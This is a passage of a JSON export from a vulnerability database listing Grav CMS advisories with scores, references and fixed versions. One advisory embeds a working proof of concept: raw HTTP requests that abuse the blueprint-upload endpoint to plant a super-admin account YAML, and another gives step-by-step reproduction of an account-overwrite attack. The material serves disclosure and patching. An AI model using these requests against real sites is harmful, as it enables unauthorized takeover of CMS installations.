                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-yh73-zyju-vqge"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        },
                        {
                            "vulnerability": "VCID-zg5t-uqx2-87fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.43"
                }
            ],
            "aliases": [
                "CVE-2024-27923",
                "GHSA-f6g2-h7qv-3m5v"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a8y8-y4zt-zqbv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95897?format=api",
            "vulnerability_id": "VCID-aa7e-n85b-wbdm",
            "summary": "Low-privileged Grav API users can create super-admin accounts via blueprint-upload\n## Summary\n\nIn Grav `2.0.0-beta.2`, a low-privileged authenticated API user with `api.media.write` can abuse `/api/v1/blueprint-upload` to write an arbitrary YAML file into `user/accounts/`, then log in as the newly created account with `api.super` privileges.\n\nThis results in full administrative compromise of the Grav API.\n\n## Details\n\nThe vulnerability is located in the API plugin's blueprint upload flow:\n\n- `user/plugins/api/classes/Api/ApiRouter.php:261`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417`\n- `user/plugins/api/classes/Api/Controllers/AuthController.php:41-55`\n\nThe issue exists because `/api/v1/blueprint-upload` accepts caller-controlled `destination` and `scope` values and uses them to resolve the final filesystem write target.\n\nWhen the request uses:\n\n- `destination=self@:`\n- `scope=users/anything`\n\nThe server resolves the write target to the shared account directory:\n\n```text\nuser/accounts/\n```\n\nThe upload handler then writes the supplied file directly into that directory and does not block YAML account files. 
Because Grav accepts account YAML files and supports a plaintext `password:` field on first login, an attacker can create a fully functional administrator account with `api.super`.\n\nThe required attacker privilege is low:\n\n```yaml\naccess:\n  api:\n    access: true\n    media:\n      write: true\n```\n\n## PoC\n\n### Step 1: Authenticate as the low-privileged API user\n\n```http\nPOST /api/v1/auth/token HTTP/1.1\nHost: 127.0.0.1:8123\nContent-Type: application/json\nConnection: close\n\n{\"username\":\"uploader\",\"password\":\"Upload123A\"}\n```\n\nExtract:\n\n```text\nUPLOADER_TOKEN = <access_token from response>\n```\n\nAttachment:\n\n<img width=\"1480\" height=\"825\" alt=\"login-uploader\" src=\"https://github.com/user-attachments/assets/5aeda840-4a37-4365-8e46-caec88066541\" />\n\n### Step 2: Upload a malicious account YAML file\n\n```http\nPOST /api/v1/blueprint-upload HTTP/1.1\nHost: 127.0.0.1:8123\nX-API-Token: <UPLOADER_TOKEN>\nContent-Type: multipart/form-data; boundary=----CodexBoundaryF01\nConnection: close\n\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"destination\"\n\nself@:\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"scope\"\n\nusers/anything\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"file\"; filename=\"pwned.yaml\"\nContent-Type: text/yaml\n\nemail: attacker@example.com\nfullname: attacker\ntitle: Site Administrator\nstate: enabled\npassword: Passw0rd!123\naccess:\n  site:\n    login: true\n  api:\n    super: true\n------CodexBoundaryF01--\n```\n\nExpected result:\n\n```json\n{\n  \"data\": [\n    {\n      \"name\": \"pwned.yaml\",\n      \"path\": \"user/accounts/pwned.yaml\"\n    }\n  ]\n}\n```\n\nAttachment:\n\n<img width=\"1484\" height=\"797\" alt=\"upload\" src=\"https://github.com/user-attachments/assets/0b24c03f-cac5-4b4d-840c-52ac0840969f\" />\n\n### Step 3: Log in as the newly created account\n\n```http\nPOST /api/v1/auth/token HTTP/1.1\nHost: 127.0.0.1:8123\nContent-Type: 
application/json\nConnection: close\n\n{\"username\":\"pwned\",\"password\":\"Passw0rd!123\"}\n```\n\nExpected result:\n\n```json\n{\n  \"data\": {\n    \"user\": {\n      \"username\": \"pwned\",\n      \"super_admin\": true\n    }\n  }\n}\n```\n\nAttachment:\n\n<img width=\"1494\" height=\"830\" alt=\"pwned-login\" src=\"https://github.com/user-attachments/assets/7a1ab7fc-d3fb-4077-9b61-09cd947241fe\" />\n\n### Step 4: Verify privileged API access\n\n```http\nGET /api/v1/system/info HTTP/1.1\nHost: 127.0.0.1:8123\nX-API-Token: <PWNED_TOKEN>\nConnection: close\n```\n\nExpected result:\n\nThe request succeeds and returns system-level information.\n\nAttachment:\n\n<img width=\"1480\" height=\"831\" alt=\"system-info\" src=\"https://github.com/user-attachments/assets/31677d61-3dbd-4ea6-9fbe-80799a628cc2\" />\n\n## Impact\n\nThis is an authenticated vertical privilege-escalation vulnerability.\n\nAny API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once `api.super` access is obtained, the attacker gains full control over the CMS management API and can:\n\n- modify content\n- alter configuration\n- manage users\n- install or update plugins/themes\n- access system-level administration features\n\nIn a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.\n\nThis issue was reproduced locally:\n\n- the upload response returned `user/accounts/pwned.yaml`\n- logging in as `pwned` succeeded\n- the new account had `super_admin = true`\n- privileged endpoints such as `/api/v1/system/info` were accessible",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42844",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00046",
                            "scoring_system": "epss",
                            "scoring_elements": "0.14661",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42844"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T14:28:07Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42844",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42844"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6xx2-m8wv-756h",
                    "reference_id": "GHSA-6xx2-m8wv-756h",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-6xx2-m8wv-756h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/120031?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.4",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.4"
                }
            ],
            "aliases": [
                "CVE-2026-42844",
                "GHSA-6xx2-m8wv-756h"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aa7e-n85b-wbdm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49298?format=api",
            "vulnerability_id": "VCID-abwg-zvc9-w7dq",
            "summary": "Grav is vulnerable to Arbitrary File Read\n- A low-privilege user account with page-editing privilege can read any server file using the \"Frontmatter\" form.\n- This includes Grav user account files - /grav/user/accounts/*.yaml. These files store the hashed user password, the 2FA secret, and the password reset token.\n- This can allow an adversary to compromise any registered account, either by triggering a password reset for a user and reading the reset token from the file, or by cracking the hashed password.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66300",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00073",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22416",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66300"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:08:33Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66300",
                    "reference_id": "CVE-2025-66300",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66300"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-p4ww-mcp9-j6f2",
                    "reference_id": "GHSA-p4ww-mcp9-j6f2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-p4ww-mcp9-j6f2"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2",
                    "reference_id": "GHSA-p4ww-mcp9-j6f2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:08:33Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66300",
                "GHSA-p4ww-mcp9-j6f2"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-abwg-zvc9-w7dq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49296?format=api",
            "vulnerability_id": "VCID-agks-r1vd-u3d6",
            "summary": "Grav vulnerable to Stored Cross-Site Scripting (XSS) in multiple parameters of the `/admin/pages/[page]` endpoint\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][metadata]`, `data[header][taxonomy][category]`, and `data[header][taxonomy][tag]` parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66311",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07273",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66311"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66311",
                    "reference_id": "CVE-2025-66311",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66311"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-mpjj-4688-3fxg",
                    "reference_id": "GHSA-mpjj-4688-3fxg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-mpjj-4688-3fxg"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg",
                    "reference_id": "GHSA-mpjj-4688-3fxg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72692?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.11.0-beta.1",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.11.0-beta.1"
                }
            ],
            "aliases": [
                "CVE-2025-66311",
                "GHSA-mpjj-4688-3fxg"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-agks-r1vd-u3d6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95468?format=api",
            "vulnerability_id": "VCID-athb-nf3a-yyga",
            "summary": "Grav Vulnerable to Administrative Account Disruption and Privilege De-escalation via User Overwrite Logic\n### Summary\nA business logic vulnerability in the Grav Admin Panel allows a low-privileged user (with only user creation permissions) to overwrite existing accounts, including the primary administrator. By creating a new user with a username that already exists, the system updates the existing account's metadata and permissions instead of rejecting the request. This leads to a Denial of Service (DoS) on administrative functions and Privilege De-escalation of the root account.\n\n### Details\nThe vulnerability stems from an insecure \"Create or Update\" logic within the user management module. When the admin-addon handles a user creation request, it does not strictly validate whether the username is already taken by a higher-privileged account. Instead of returning a \"409 Conflict\" or a validation error, the application logic proceeds to overwrite the existing user configuration file (e.g., user/accounts/root0.yaml) with the new, lower-privileged data provided by the attacker.\nBecause the attacker cannot assign higher permissions to themselves (due to existing fixes), the result is that the targeted account (the original Admin/Root) has its access levels wiped or replaced by the attacker's input, effectively locking the real administrator out of the system.\n\n### PoC\n1. Log in as a Super User (e.g., root0) and create a low-privileged user (e.g., adminuser).\n2. Assign adminuser the following specific permissions:\nadmin.login\nadmin.users.list\nadmin.users.read\nadmin.users.create\n3. Log out and log back in as adminuser.\n4. Navigate to User Accounts -> Add.\n5. Fill in the form with the following details:\nUsername: root0 (The exact username of the Super User)\nEmail: `anything@grav.f`\nFullname: Fake Root0\n7. Click Save.\n8. Observe that the account is successfully \"created\".\n9. 
The original administrative permissions are gone, and the account is now restricted.\n\n#### PoC video\nhttps://github.com/user-attachments/assets/047cb44e-0279-402b-b4fb-12bf5d427a5e\n\n### Impact\nThis is a Privilege De-escalation and Account Disruption vulnerability.\nWho is impacted: Any Grav installation where a non-admin user is granted permission to create other users.\nConsequence: An attacker can effectively disable all administrative accounts on the platform, leading to a complete loss of management control over the CMS.\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`d904efc33`](https://github.com/getgrav/grav/commit/d904efc33) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `UserObject::save` already had a uniqueness guard (commit [`19c2f8da7`](https://github.com/getgrav/grav/commit/19c2f8da7), November 2025) that blocks the PoC. This release tightens that guard:\n\n1. `strpos($key, '@@')` → `str_contains($key, '@@')`. The previous form was falsy when the transient-key marker was at position 0 (e.g. `@@hash`), silently bypassing the check. `str_contains` returns a proper boolean.\n2. The `instanceof FileStorage` gate was dropped so the uniqueness check runs for any `FlexStorageInterface` backend — not just the default file-per-user YAML one.\n\nA low-privileged user with `admin.users.create` can no longer disrupt a super-admin account by submitting that admin's username through the \"add user\" form.\n\n**Files:**\n- [`system/src/Grav/Common/Flex/Types/Users/UserObject.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Flex/Types/Users/UserObject.php).\n- [`tests/unit/Grav/Common/Security/UserOverwriteSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/UserOverwriteSecurityTest.php) — 3 tests pinning the PoC, the `@@`-prefix edge case, and pass-through for free usernames.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42609",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1284",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42609"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-rr73-568v-28f8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-14T17:56:12Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-rr73-568v-28f8"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42609",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42609"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rr73-568v-28f8",
                    "reference_id": "GHSA-rr73-568v-28f8",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-rr73-568v-28f8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42609",
                "GHSA-rr73-568v-28f8"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-athb-nf3a-yyga"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49310?format=api",
            "vulnerability_id": "VCID-bafn-ne38-nucy",
